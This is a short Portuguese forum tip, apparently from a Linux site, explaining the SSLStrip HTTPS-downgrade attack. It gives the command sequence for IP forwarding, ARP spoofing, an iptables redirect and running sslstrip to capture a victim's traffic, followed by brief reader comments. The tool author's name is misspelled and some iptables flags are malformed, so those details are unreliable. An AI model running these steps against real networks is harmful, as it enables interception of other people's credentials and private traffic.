Desde que
Moxie Moulinsart exibiu seu
SSLStrip na Blackhat, o MODO PARANÓICO de muitas pessoas começou a dar o alarme, e não é pra menos, já que com essa ferramenta qualquer pessoa pode capturar seu tráfego SSL sem problemas.
O funcionamento do SSLStrip é simples, substituindo todas as requisições "https://" de uma página por "http://", e realiza um MITM (Man-In-The-Middle) entre o servidor e o cliente. A ideia é que a vítima e o atacante se comuniquem através de HTTP, enquanto o atacante e o servidor se comunicam em HTTPS, com o certificado do servidor. Portanto, o atacante é capaz de ver todo o tráfego da vítima em texto plano.
Abaixo, segue um vídeo onde podemos ver o funcionamento dessa ferramenta:
Resumidamente, os passos seriam:
Configurar o IP Forwarding:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Realizar um ataque ARP MITM entre as 2 máquinas:
# arpspoof -i eth0 -t HOST_ALVO
Redirecionar o tráfego com iptables:
# iptables -t nat -A PREROUTING -p tcp -destination-port 80 -j REDIRECT -to-ports 8080
Iniciar o SSLStrip, definindo um arquivo onde armazenará os dados capturados:
# python sslstrip.py -w archivo
Espero que achem interessante!
Mais informações na página oficial do SSLStrip:
http://www.thoughtcrime.org/software/sslstrip/
[1] Comentário enviado por
dastyler em 03/08/2010 - 23:57h:
Muito interessante.
uma saida para este ataque seria bloquear o arpspoof?
Abraço!
[2] Comentário enviado por
vinicius.almeida em 05/09/2010 - 22:28h:
bacana ..esta no meu favorito.
[3] Comentário enviado por
stilldre em 19/12/2010 - 16:34h:
favoritos!
[4] Comentário enviado por
Thalysson S em 23/01/2011 - 19:15h:
Very nice !!!!
[5] Comentário enviado por
Pekena Lane em 02/09/2011 - 14:39h:
Interessante
TARA - Tiger Analytical Research Assistant - Auditoria em sistemas Linux
Versão para impressora
Indicar para um amigo
Enviar dica